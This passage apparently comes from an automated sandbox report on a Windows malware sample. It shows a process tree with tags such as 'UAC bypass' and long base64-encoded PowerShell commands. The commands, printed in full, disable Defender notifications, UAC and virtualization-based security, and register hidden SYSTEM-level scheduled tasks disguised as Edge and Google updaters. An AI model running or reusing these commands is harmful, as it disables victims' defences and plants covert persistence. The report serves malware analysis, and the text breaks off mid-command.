AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgAgAFMAZQBjAHUAcgBpAHQAeQAgAEMAZQBuAHQAZQByAFwATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAiACAALQBOAGEAbQBlACAAIgBEAGkAcwBhAGIAbABlAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAIgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIAAiAEQAVwBvAHIAZAAiACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAIgAgAC0ATgBhAG0AZQAgACIARABpAHMAYQBiAGwAZQBOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACIAIAAtAFQAeQBwAGUAIABEAFcAbwByAGQAIAAtAFYAYQBsAHUAZQAgADEAIAAtAEYAbwByAGMAZQAKAE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACIASABLAEMAVQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAIgAgAC0ATgBhAG0AZQAgACIATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAiACAALQBGAG8AcgBjAGUACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAIgAgAC0ATgBhAG0AZQAgACIARABpAHMAYQBiAGwAZQBOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACIAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAIgBEAFcAbwByAGQAIgAgAC0AVgBhAGwAdQBlACAAMQAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEMAVQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACIAIAAtAE4AYQBtAGUAIAAiAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAiACAALQBUAHkAcABlACAARABXAG8AcgBkACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUACgAKAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFAAbwBsAGkAYwBpAGUAcwBcAFMAeQBzAHQAZQBtACIAIAAtAE4AYQBtAGUAIAAiAEUAbgBhAGIAbABlAEwAVQBBACIAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAG8AcgBkACAALQBWAGEAbAB1AGUAIAAwACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsATABNADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABQAG8AbABpAGMAaQBlAHMAXABTAHkAcwB0AGUAbQAiACAALQBOAGEAbQBlACAAIgBFAG4AYQBiAGwAZQBMAFUAQQAiACAALQBUAHkAcABlACAARABXAG8AcgBkACAALQBWAGEAbAB1AGUAIAAwACAALQBGAG8AcgBjAGUACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABQAG8AbABpAGMAaQBlAHMAXABTAHkAcwB0AGUAbQAiACAALQBOAGEAbQBlACAAIgBFAG4AYQBiAGwAZQBMAFUAQQAiACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAEQAVwBvAHIAZAAgAC0AVgBhAGwAdQBlACAAMAAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUABvAGwAaQBjAGkAZQBzAFwAUwB5AHMAdABlAG0AIgAgAC0ATgBhAG0AZQAgACIARQBuAGEAYgBsAGUATABVAEEAIgAgAC0AVAB5AHAAZQAgAEQAVwBvAHIAZAAgAC0AVgBhAGwAdQBlACAAMAAgAC0ARgBvAHIAYwBlAAoACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsATABNADoAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGEAdABhACAAQwBvAGwAbABlAGMAdABpAG8AbgAiACAALQBOAGEAbQBlACAAIgBBAGwAbABvAHcAVABlAGwAZQBtAGUAdAByAHkAIgAgAC0AVgBhAGwAdQBlACAAMQAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABEAFcATwBSAEQAIAAtAEYAbwByAGMAZQAKAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEQAYQB0AGEAIABDAG8AbABsAGUAYwB0AGkAbwBuACIAIAAtAE4AYQBtAGUAIAAiAEEAbABsAG8AdwBUAGUAbABlAG0AZQB0AHIAeQAiACAALQBUAHkAcABlACAARABXAG8AcgBkACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGEAdABhACAAQwBvAGwAbABlAGMAdABpAG8AbgAiACAALQBOAGEAbQBlACAAIgBBAGwAbABvAHcAVABlAGwAZQBtAGUAdAByAHkAIgAgAC0AVgBhAGwAdQBlACAAMQAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABEAFcATwBSAEQAIAAtAEYAbwByAGMAZQAKAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEQAYQB0AGEAIABDAG8AbABsAGUAYwB0AGkAbwBuACIAIAAtAE4AYQBtAGUAIAAiAEEAbABsAG8AdwBUAGUAbABlAG0AZQB0AHIAeQAiACAALQBUAHkAcABlACAARABXAG8AcgBkACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUACgAKAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBMAE0AOgBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFcAaQBuAGQAbwB3AHMAIABTAGUAYQByAGMAaAAiACAALQBOAGEAbQBlACAAIgBBAGwAbABvAHcAQwBvAHIAdABhAG4AYQAiACAALQBWAGEAbAB1AGUAIAAwACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAEQAVwBPAFIARAAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAVwBpAG4AZABvAHcAcwAgAFMAZQBhAHIAYwBoACIAIAAtAE4AYQBtAGUAIAAiAEEAbABsAG8AdwBDAG8AcgB0AGEAbgBhACIAIAAtAFQAeQBwAGUAIABEAFcAbwByAGQAIAAtAFYAYQBsAHUAZQAgADAAIAAtAEYAbwByAGMAZQAKAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBDAFUAOgBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFcAaQBuAGQAbwB3AHMAIABTAGUAYQByAGMAaAAiACAALQBOAGEAbQBlACAAIgBBAGwAbABvAHcAQwBvAHIAdABhAG4AYQAiACAALQBWAGEAbAB1AGUAIAAwACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAEQAVwBPAFIARAAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEMAVQA6AFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAVwBpAG4AZABvAHcAcwAgAFMAZQBhAHIAYwBoACIAIAAtAE4AYQBtAGUAIAAiAEEAbABsAG8AdwBDAG8AcgB0AGEAbgBhACIAIAAtAFQAeQBwAGUAIABEAFcAbwByAGQAIAAtAFYAYQBsAHUAZQAgADAAIAAtAEYAbwByAGMAZQAKAAoATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBZAFMAVABFAE0AXABDAHUAcgByAGUAbgB0AEMAbwBuAHQAcgBvAGwAUwBlAHQAXABDAG8AbgB0AHIAbwBsAFwARABlAHYAaQBjAGUARwB1AGEAcgBkACIAIAAtAE4AYQBtAGUAIAAiAEUAbgBhAGIAbABlAFYAaQByAHQAdQBhAGwAaQB6AGEAdABpAG8AbgBCAGEAcwBlAGQAUwBlAGMAdQByAGkAdAB5ACIAIAAtAFYAYQBsAHUAZQAgADAAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsATABNADoAXABTAFkAUwBUAEUATQBcAEMAdQByAHIAZQBuAHQAQwBvAG4AdAByAG8AbABTAGUAdABcAEMAbwBuAHQAcgBvAGwAXABEAGUAdgBpAGMAZQBHAHUAYQByAGQAIgAgAC0ATgBhAG0AZQAgACIARQBuAGEAYgBsAGUAVgBpAHIAdAB1AGEAbABpAHoAYQB0AGkAbwBuAEIAYQBzAGUAZABTAGUAYwB1AHIAaQB0AHkAIgAgAC0AVAB5AHAAZQAgAEQAVwBvAHIAZAAgAC0AVgBhAGwAdQBlACAAMAAgAC0ARgBvAHIAYwBlAAoATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEMAVQA6AFwAUwBZAFMAVABFAE0AXABDAHUAcgByAGUAbgB0AEMAbwBuAHQAcgBvAGwAUwBlAHQAXABDAG8AbgB0AHIAbwBsAFwARABlAHYAaQBjAGUARwB1AGEAcgBkACIAIAAtAE4AYQBtAGUAIAAiAEUAbgBhAGIAbABlAFYAaQByAHQAdQBhAGwAaQB6AGEAdABpAG8AbgBCAGEAcwBlAGQAUwBlAGMAdQByAGkAdAB5ACIAIAAtAFYAYQBsAHUAZQAgADAAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAFkAUwBUAEUATQBcAEMAdQByAHIAZQBuAHQAQwBvAG4AdAByAG8AbABTAGUAdABcAEMAbwBuAHQAcgBvAGwAXABEAGUAdgBpAGMAZQBHAHUAYQByAGQAIgAgAC0ATgBhAG0AZQAgACIARQBuAGEAYgBsAGUAVgBpAHIAdAB1AGEAbABpAHoAYQB0AGkAbwBuAEIAYQBzAGUAZABTAGUAYwB1AHIAaQB0AHkAIgAgAC0AVAB5AHAAZQAgAEQAVwBvAHIAZAAgAC0AVgBhAGwAdQBlACAAMAAgAC0ARgBvAHIAYwBlAAoACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsATABNADoAXABTAFkAUwBUAEUATQBcAEMAdQByAHIAZQBuAHQAQwBvAG4AdAByAG8AbABTAGUAdABcAEMAbwBuAHQAcgBvAGwAXABEAGUAdgBpAGMAZQBHAHUAYQByAGQAIgAgAC0ATgBhAG0AZQAgACIAUgBlAHEAdQBpAHIAZQBQAGwAYQB0AGYAbwByAG0AUwBlAGMAdQByAGkAdAB5AEYAZQBhAHQAdQByAGUAcwAiACAALQBWAGEAbAB1AGUAIAAwACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAEQAVwBPAFIARAAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBZAFMAVABFAE0AXABDAHUAcgByAGUAbgB0AEMAbwBuAHQAcgBvAGwAUwBlAHQAXABDAG8AbgB0AHIAbwBsAFwARABlAHYAaQBjAGUARwB1AGEAcgBkACIAIAAtAE4AYQBtAGUAIAAiAFIAZQBxAHUAaQByAGUAUABsAGEAdABmAG8AcgBtAFMAZQBjAHUAcgBpAHQAeQBGAGUAYQB0AHUAcgBlAHMAIgAgAC0AVAB5AHAAZQAgAEQAVwBvAHIAZAAgAC0AVgBhAGwAdQBlACAAMAAgAC0ARgBvAHIAYwBlAAoATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEMAVQA6AFwAUwBZAFMAVABFAE0AXABDAHUAcgByAGUAbgB0AEMAbwBuAHQAcgBvAGwAUwBlAHQAXABDAG8AbgB0AHIAbwBsAFwARABlAHYAaQBjAGUARwB1AGEAcgBkACIAIAAtAE4AYQBtAGUAIAAiAFIAZQBxAHUAaQByAGUAUABsAGEAdABmAG8AcgBtAFMAZQBjAHUAcgBpAHQAeQBGAGUAYQB0AHUAcgBlAHMAIgAgAC0AVgBhAGwAdQBlACAAMAAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABEAFcATwBSAEQAIAAtAEYAbwByAGMAZQAKAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBDAFUAOgBcAFMAWQBTAFQARQBNAFwAQwB1AHIAcgBlAG4AdABDAG8AbgB0AHIAbwBsAFMAZQB0AFwAQwBvAG4AdAByAG8AbABcAEQAZQB2AGkAYwBlAEcAdQBhAHIAZAAiACAALQBOAGEAbQBlACAAIgBSAGUAcQB1AGkAcgBlAFAAbABhAHQAZgBvAHIAbQBTAGUAYwB1AHIAaQB0AHkARgBlAGEAdAB1AHIAZQBzACIAIAAtAFQAeQBwAGUAIABEAFcAbwByAGQAIAAtAFYAYQBsAHUAZQAgADAAIAAtAEYAbwByAGMAZQAKAAoATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBZAFMAVABFAE0AXABDAHUAcgByAGUAbgB0AEMAbwBuAHQAcgBvAGwAUwBlAHQAXABDAG8AbgB0AHIAbwBsAFwAUwBlAHMAcwBpAG8AbgAgAE0AYQBuAGEAZwBlAHIAXABNAGUAbQBvAHIAeQAgAE0AYQBuAGEAZwBlAG0AZQBuAHQAIgAgAC0ATgBhAG0AZQAgACIATABhAHIAZwBlAFAAYQBnAGUATQBpAG4AaQBtAHUAbQAiACAALQBWAGEAbAB1AGUAIAAwACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAEQAVwBPAFIARAAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBZAFMAVABFAE0AXABDAHUAcgByAGUAbgB0AEMAbwBuAHQAcgBvAGwAUwBlAHQAXABDAG8AbgB0AHIAbwBsAFwAUwBlAHMAcwBpAG8AbgAgAE0AYQBuAGEAZwBlAHIAXABNAGUAbQBvAHIAeQAgAE0AYQBuAGEAZwBlAG0AZQBuAHQAIgAgAC0ATgBhAG0AZQAgACIATABhAHIAZwBlAFAAYQBnAGUATQBpAG4AaQBtAHUAbQAiACAALQBUAHkAcABlACAARABXAG8AcgBkACAALQBWAGEAbAB1AGUAIAAwACAALQBGAG8AcgBjAGUACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAFkAUwBUAEUATQBcAEMAdQByAHIAZQBuAHQAQwBvAG4AdAByAG8AbABTAGUAdABcAEMAbwBuAHQAcgBvAGwAXABTAGUAcwBzAGkAbwBuACAATQBhAG4AYQBnAGUAcgBcAE0AZQBtAG8AcgB5ACAATQBhAG4AYQBnAGUAbQBlAG4AdAAiACAALQBOAGEAbQBlACAAIgBMAGEAcgBnAGUAUABhAGcAZQBNAGkAbgBpAG0AdQBtACIAIAAtAFYAYQBsAHUAZQAgADAAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAFkAUwBUAEUATQBcAEMAdQByAHIAZQBuAHQAQwBvAG4AdAByAG8AbABTAGUAdABcAEMAbwBuAHQAcgBvAGwAXABTAGUAcwBzAGkAbwBuACAATQBhAG4AYQBnAGUAcgBcAE0AZQBtAG8AcgB5ACAATQBhAG4AYQBnAGUAbQBlAG4AdAAiACAALQBOAGEAbQBlACAAIgBMAGEAcgBnAGUAUABhAGcAZQBNAGkAbgBpAG0AdQBtACIAIAAtAFQAeQBwAGUAIABEAFcAbwByAGQAIAAtAFYAYQBsAHUAZQAgADAAIAAtAEYAbwByAGMAZQAKAA==
        6⤵
        Modifies Windows Defender notification settings
        UAC bypass
        
        PID:4780
        
        C:\Windows\system32\chcp.com
        
        "C:\Windows\system32\chcp.com" 65001
        7⤵
        
        PID:4192
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -exec bypass -enc YwBoAGMAcAAgADYANQAwADAAMQAKACQAUAByAG8AZwByAGUAcwBzAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAJwBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACcACgAKAFMAZQB0AC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIAAtAFMAYwBvAHAAZQAgAEMAdQByAHIAZQBuAHQAVQBzAGUAcgAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABMAG8AYwBhAGwATQBhAGMAaABpAG4AZQAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgAKACQAYQBjAHQAaQBvAG4AIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAIgBCAHIAYQB2AGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIALgBlAHgAZQAiACAALQBXAG8AcgBrAGkAbgBnAEQAaQByAGUAYwB0AG8AcgB5ACAAIgAkAGUAbgB2ADoAUABSAE8ARwBSAEEATQBEAEEAVABBAFwAQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUAIgA7AAoAJAB0AHIAaQBnAGcAZQByAEQAYQBpAGwAeQAgAD0AIABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0ARABhAGkAbAB5ACAALQBBAHQAIAAiADAAMAA6ADAAMAAiADsACgAkAHQAcgBpAGcAZwBlAHIATABvAGcAbwBuACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBBAHQATABvAGcATwBuADsACgAkAHMAZQB0AHQAaQBuAGcAcwAgAD0AIABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAUwBlAHQAdABpAG4AZwBzAFMAZQB0ACAALQBBAGwAbABvAHcAUwB0AGEAcgB0AEkAZgBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAFMAdABhAHIAdABXAGgAZQBuAEEAdgBhAGkAbABhAGIAbABlACAALQBIAGkAZABkAGUAbgAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBFAHgAZQBjAHUAdABpAG8AbgBUAGkAbQBlAEwAaQBtAGkAdAAgADAAOwAKAFIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAFQAYQBzAGsATgBhAG0AZQAgACIATQBpAGMAcgBvAHMAbwBmAHQARQBkAGcAZQBVAHAAZABhAHQAZQBUAGEAcwBrAE0AYQBjAGgAaQBuAGUAQwBvAHIAZQB7AEIAOABBAEMAMQA2ADYAOAAtADkANwBEADIALQA0ADIARABCAC0AOQA0AEQAQgAtAEQAMwAyAEQARQA1ADAANQA4ADgAQQAxAH0AIgAgAC0AQQBjAHQAaQBvAG4AIAAkAGEAYwB0AGkAbwBuACAALQBUAHIAaQBnAGcAZQByACAAJAB0AHIAaQBnAGcAZQByAEQAYQBpAGwAeQAsACAAJAB0AHIAaQBnAGcAZQByAEwAbwBnAG8AbgAgAC0AUwBlAHQAdABpAG4AZwBzACAAJABzAGUAdAB0AGkAbgBnAHMAIAAtAFIAdQBuAEwAZQB2AGUAbAAgAEgAaQBnAGgAZQBzAHQAIAAtAFUAcwBlAHIAIAAiAFMAWQBTAFQARQBNACIACgAKACQAYQBjAHQAaQBvAG4AIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAIgBHAG8AbwBnAGwAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgAuAGUAeABlACIAIAAtAFcAbwByAGsAaQBuAGcARABpAHIAZQBjAHQAbwByAHkAIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIALgBlAHgAZQAiADsACgAkAHQAcgBpAGcAZwBlAHIARABhAGkAbAB5ACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBEAGEAaQBsAHkAIAAtAEEAdAAgACIAMAAwADoAMAAwACIAOwAKACQAdAByAGkAZwBnAGUAcgBMAG8AZwBvAG4AIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABMAG8AZwBPAG4AOwAKACQAcwBlAHQAdABpAG4AZwBzACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAIAAtAEEAbABsAG8AdwBTAHQAYQByAHQASQBmAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0AUwB0AGEAcgB0AFcAaABlAG4AQQB2AGEAaQBsAGEAYgBsAGUAIAAtAEgAaQBkAGQAZQBuACAALQBEAG8AbgB0AFMAdABvAHAASQBmAEcAbwBpAG4AZwBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAMAA7AAoAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AVABhAHMAawBOAGEAbQBlACAAIgBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQBUAGEAcwBrACIAIAAtAEEAYwB0AGkAbwBuACAAJABhAGMAdABpAG8AbgAgAC0AVAByAGkAZwBnAGUAcgAgACQAdAByAGkAZwBnAGUAcgBEAGEAaQBsAHkALAAgACQAdAByAGkAZwBnAGUAcgBMAG8AZwBvAG4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACQAcwBlAHQAdABpAG4AZwBzACAALQBSAHUAbgBMAGUAdgBlAGwAIABIAGkAZwBoAGUAcwB0ACAALQBVAHMAZQByACAAIgBTAFkAUwBUAEUATQAiAAoACgAkAGEAYwB0AGkAbwBuACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAGMAdABpAG8AbgAgAC0ARQB4AGUAYwB1AHQAZQAgACIARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIANgA0AC4AZQB4AGUAIgAgAC0AVwBvAHIAawBpAG4AZwBEAGkAcgBlAGMAdABvAHIAeQAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABHAG8AbwBnAGwAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgA2ADQALgBlAHgAZQAiADsACgAkAHQAcgBpAGcAZwBlAHIARABhAGkAbAB5ACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBEAGEAaQBsAHkAIAAtAEEAdAAgACIAMAAwADoAMAAwACIAOwAKACQAdAByAGkAZwBnAGUAcgBMAG8AZwBvAG4AIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABMAG8AZwBPAG4AOwAKACQAcwBlAHQAdABpAG4AZwBzACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAIAAtAEEAbABsAG8AdwBTAHQAYQByAHQASQBmAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0AUwB0AGEAcgB0AFcAaABlAG4AQQB2AGEAaQBsAGEAYgBsAGUAIAAtAEgAaQBkAGQAZQBuACAALQBEAG8AbgB0AFMAdABvAHAASQBmAEcAbwBpAG4AZwBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAMAA7AAoAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AVABhAHMAawBOAGEAbQBlACAAIgBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQBUAGEAcwBrAFMAeQBzAHQAZQBtAF8AMQBEADkANAA2ADUAMABfAFgATQA3AFQAIgAgAC0AQQBjAHQAaQBvAG4AIAAkAGEAYwB0AGkAbwBuACAALQBUAHIAaQBnAGcAZQByACAAJAB0AHIAaQBnAGcAZQByAEQAYQBpAGwAeQAsACAAJAB0AHIAaQBnAGcAZQByAEwAbwBnAG8AbgAgAC0AUwBlAHQAdABpAG4AZwBzACAAJABzAGUAdAB0AGkAbgBnAHMAIAAtAFIAdQBuAEwAZQB2AGUAbAAgAEgAaQBnAGgAZQBzAHQAIAAtAFUAcwBlAHIAIAAiAFMAWQBTAFQARQBNACIACgAKACQAYQBjAHQAaQBvAG4AIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAIgBFAG0AYgBlAGQAaQB0AC4AZQB4AGUAIgAgAC0AVwBvAHIAawBpAG4AZwBEAGkAcgBlAGMAdABvAHIAeQAgACIAJABlAG4AdgA6AFUAUwB